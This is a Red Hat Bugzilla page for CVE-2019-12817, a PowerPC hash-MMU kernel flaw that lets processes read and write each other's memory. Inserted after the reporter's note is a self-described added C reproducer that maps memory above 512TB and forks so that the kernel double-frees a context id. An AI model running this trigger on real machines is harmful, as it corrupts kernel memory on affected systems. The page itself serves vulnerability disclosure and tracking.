Bug 1720616 (CVE-2019-12817) - CVE-2019-12817 kernel: ppc: unrelated processes being able to read/write to each other's virtual memory
Summary: CVE-2019-12817 kernel: ppc: unrelated processes being able to read/write to e...
Keywords:
Status: NEW
Alias: CVE-2019-12817
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=important,public=20190624,repo...
Duplicates: 1720341
Depends On: 1723323 1723324 1723697
Blocks: 1723808 1720619 1734689
 
Reported: 2019-06-14 11:20 UTC by msiddiqu
Modified: 2019-09-16 21:54 UTC (History)
CC List: 47 users

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in the way the Linux kernel's memory subsystem on certain 64-bit PowerPCs with the hash page table MMU handled memory above 512TB. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Clone Of:
Environment:
Last Closed:




Links
System: Red Hat Product Errata  ID: RHBA-2019:2767  Last Updated: 2019-09-12 19:12:36 UTC
System: Red Hat Product Errata  ID: RHSA-2019:2703  Last Updated: 2019-09-10 19:00:22 UTC

Description msiddiqu 2019-06-14 11:20:20 UTC
A flaw was found in the way the Linux kernel's memory subsystem on certain
64-bit PowerPC systems with the hash page table MMU handled memory above 512TB. A local,
unprivileged user could use this flaw to escalate their privileges on the system.

Upstream commit that introduced this issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f384796c40dc

Upstream fix:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ca72d88378b2f2444d3ec145dd442d449d3fefbc

Comment 1 Petr Matousek 2019-06-14 12:49:56 UTC
*** Bug 1720341 has been marked as a duplicate of this bug. ***

Comment 2 Petr Matousek 2019-06-24 09:44:02 UTC
Note from the reporter:

This bug only affects machines using 64-bit CPUs with the hash page table MMU,
see below for more detail on affected CPUs.

To trigger the bug a process must allocate memory above 512TB. That only happens
if userspace explicitly requests it with mmap(). That process must then fork(),
at this point the child incorrectly inherits the "context id" of the parent
associated with the mapping above 512TB. It may then be possible for the
parent/child to write to each other's mappings above 512TB, which should not be
possible, and constitutes memory corruption.

If instead the child process exits, all its context ids are freed, including the
context id that is still in use by the parent for the mapping above 512TB. That
id can then be reallocated to a third process, that process can then read/write
to the parent's mapping above 512TB. Additionally if the freed id is used for
the third process's primary context id, then the parent is able to read/write to
the third process's mappings *below* 512TB.

If the parent and child both exit before another process is allocated the freed
context id, the kernel will notice the double free of the id and print a warning
such as:

ida_free called for id=103 which is not allocated.
WARNING: CPU: 8 PID: 7293 at lib/idr.c:520 ida_free_rc+0x1b4/0x1d0

Only machines using the hash page table (HPT) MMU are affected, e.g. PowerPC 970
(G5), PA6T, Power5/6/7/8/9. By default Power9 bare metal machines (powernv) use
the Radix MMU and are not affected, unless the machine has been explicitly
booted in HPT mode (using disable_radix on the kernel command line). KVM guests
on Power9 may be affected if the host or guest is configured to use the HPT MMU.
LPARs under PowerVM on Power9 are affected as they always use the HPT MMU.
Kernels built with PAGE_SIZE=4K are not affected.
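
The trigger sequence the reporter describes above, as an added example that is not part of the bug report or of the kernel tree: the program checks the two preconditions from the note (hash MMU, non-4K page size), asks mmap() for a mapping at the 512TB boundary, forks, and lets the child exit. It stops at the observable signal the note gives, the double free of the context id that the kernel reports as "ida_free called for id=... which is not allocated." when the parent exits; it does not attempt the cross-process read/write. Assumptions: that /proc/cpuinfo on 64-bit Book3S PowerPC carries an "MMU : Hash" or "MMU : Radix" line, that an mmap() hint above 512TB without MAP_FIXED is honoured only on kernels that expose the larger address space (elsewhere the hint is ignored and the program reports nothing to trigger), and the cpuinfo text used in the check is constructed.

```c
/* Added reproducer for the context-id double free described in the
 * reporter's note; not from the bug report or the kernel tree.
 * Assumes the "MMU : Hash|Radix" line in /proc/cpuinfo on ppc64 and
 * that a >512TB mmap() hint is honoured only where the 4PB address
 * space exists.  Build: cc -O2 -o ctxid ctxid.c ; run as any user,
 * then look at dmesg on an affected kernel. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

#define TB (1ULL << 40)
#define CONTEXT_BOUNDARY (512 * TB)   /* 0x0002000000000000: first address needing an extra context id */

/* 1 if addr lies in the region above 512TB that the note talks about. */
int above_512tb(uint64_t addr) { return addr >= CONTEXT_BOUNDARY; }

/* Scan cpuinfo-style text for a line starting with "MMU".
 * Returns 1 for the hash MMU, 0 for radix, -1 if no such line (not ppc64). */
int hpt_mmu_from_cpuinfo(const char *text)
{
    const char *line = text;
    while (line && *line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len >= 3 && strncmp(line, "MMU", 3) == 0) {
            const char *colon = memchr(line, ':', len);
            if (colon)
                return memmem(colon, len - (size_t)(colon - line), "Hash", 4) != NULL;
        }
        line = eol ? eol + 1 : NULL;
    }
    return -1;
}

/* Request a mapping at the 512TB boundary without MAP_FIXED.  Where the
 * kernel does not support addresses that high the hint is simply ignored
 * and a low address comes back; that case is reported as NULL. */
void *map_above_512tb(size_t len)
{
    void *hint = (void *)(uintptr_t)CONTEXT_BOUNDARY;
    void *p = mmap(hint, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    if (!above_512tb((uint64_t)(uintptr_t)p)) {
        munmap(p, len);              /* hint ignored: nothing to reproduce */
        return NULL;
    }
    return p;
}

/* Read a whole (possibly large, many-CPU) /proc file into memory. */
static char *read_all(const char *path)
{
    FILE *f = fopen(path, "r");
    if (!f) return NULL;
    size_t cap = 65536, n = 0, got;
    char *buf = malloc(cap);
    while (buf && (got = fread(buf + n, 1, cap - n - 1, f)) > 0) {
        n += got;
        if (n + 1 == cap) { cap *= 2; buf = realloc(buf, cap); }
    }
    fclose(f);
    if (buf) buf[n] = '\0';
    return buf;
}

int main(void)
{
    char *cpuinfo = read_all("/proc/cpuinfo");
    int hpt = cpuinfo ? hpt_mmu_from_cpuinfo(cpuinfo) : -1;
    free(cpuinfo);
    printf("hash MMU: %s\n", hpt == 1 ? "yes" : hpt == 0 ? "no (radix)" : "not ppc64");

    size_t len = (size_t)sysconf(_SC_PAGESIZE);
    if (len == 4096)
        puts("4K page size: kernel not affected");

    void *p = map_above_512tb(len);
    if (!p) {
        puts("kernel ignored or refused the >512TB hint; nothing to trigger");
        return 0;
    }
    printf("mapped %zu bytes at %p; the 512TB region's context id is now in use\n", len, p);
    memset(p, 0x41, len);            /* touch the page so the mapping is populated */

    pid_t pid = fork();
    if (pid == 0)
        _exit(0);                    /* child inherits the context id and frees it on exit */
    if (pid > 0)
        waitpid(pid, NULL, 0);
    puts("parent exiting: on an affected kernel dmesg now shows the ida_free warning");
    return 0;                        /* parent's exit frees the same id a second time */
}
```

On a Power9 host booted with radix, or on any non-PowerPC machine, map_above_512tb() returns NULL and the program ends before the fork; that is the expected outcome on an unaffected system, and the cpuinfo and page-size lines tell you which of the note's preconditions was not met.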

Comment 3 Petr Matousek 2019-06-24 09:46:09 UTC
Acknowledgments:

Name: Michael Ellerman

Comment 4 Petr Matousek 2019-06-24 09:48:39 UTC
Statement:

Red Hat Product Security is aware of this issue. Updates will be released as they become available.

Comment 8 Marian Rehak 2019-06-25 08:06:05 UTC
Created kernel tracking bugs for this issue:

Affects: fedora-all [bug 1723697]

Comment 9 Petr Matousek 2019-06-25 09:16:03 UTC
External References:

https://seclists.org/oss-sec/2019/q2/200

Comment 10 errata-xmlrpc 2019-09-10 19:00:20 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2019:2703 https://access.redhat.com/errata/RHSA-2019:2703

